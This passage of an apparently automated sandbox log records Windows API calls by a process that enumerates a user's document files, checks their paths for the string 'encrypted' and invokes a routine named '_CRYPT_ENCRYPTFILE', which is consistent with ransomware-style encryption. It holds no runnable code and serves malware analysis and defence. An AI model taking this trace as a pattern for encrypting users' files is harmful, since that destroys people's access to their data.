hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0033.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.633] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.633] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.633] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.633] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb902e950, ftCreationTime.dwHighDateTime=0x1d5c09a, ftLastAccessTime.dwLowDateTime=0x64701b50, ftLastAccessTime.dwHighDateTime=0x1d5c528, ftLastWriteTime.dwLowDateTime=0x64701b50, ftLastWriteTime.dwHighDateTime=0x1d5c528, nFileSizeHigh=0x0, nFileSizeLow=0xa240, dwReserved0=0x0, dwReserved1=0x777648, cFileName="M6n9gNS1E7rNH.pps", cAlternateFileName="M6N9GN~1.PPS")) returned 0x7c20c0 [0033.633] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0033.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0033.633] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.633] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb902e950, ftCreationTime.dwHighDateTime=0x1d5c09a, ftLastAccessTime.dwLowDateTime=0x64701b50, ftLastAccessTime.dwHighDateTime=0x1d5c528, ftLastWriteTime.dwLowDateTime=0x64701b50, ftLastWriteTime.dwHighDateTime=0x1d5c528, nFileSizeHigh=0x0, nFileSizeLow=0xa240, dwReserved0=0x0, dwReserved1=0x777648, cFileName="M6n9gNS1E7rNH.pps", cAlternateFileName="M6N9GN~1.PPS")) returned 0x7c20c0 [0033.633] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0033.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0033.633] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JhnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hnEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nEQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EQt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qt\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gNS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NS1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7rNH.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0033.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0033.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0033.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0033.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0033.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.636] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.636] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0033.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0033.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.636] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0033.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0033.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.636] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0033.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0033.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0033.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0033.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0033.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.637] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.637] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.637] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.637] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.637] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb902e950, ftCreationTime.dwHighDateTime=0x1d5c09a, ftLastAccessTime.dwLowDateTime=0x64701b50, ftLastAccessTime.dwHighDateTime=0x1d5c528, 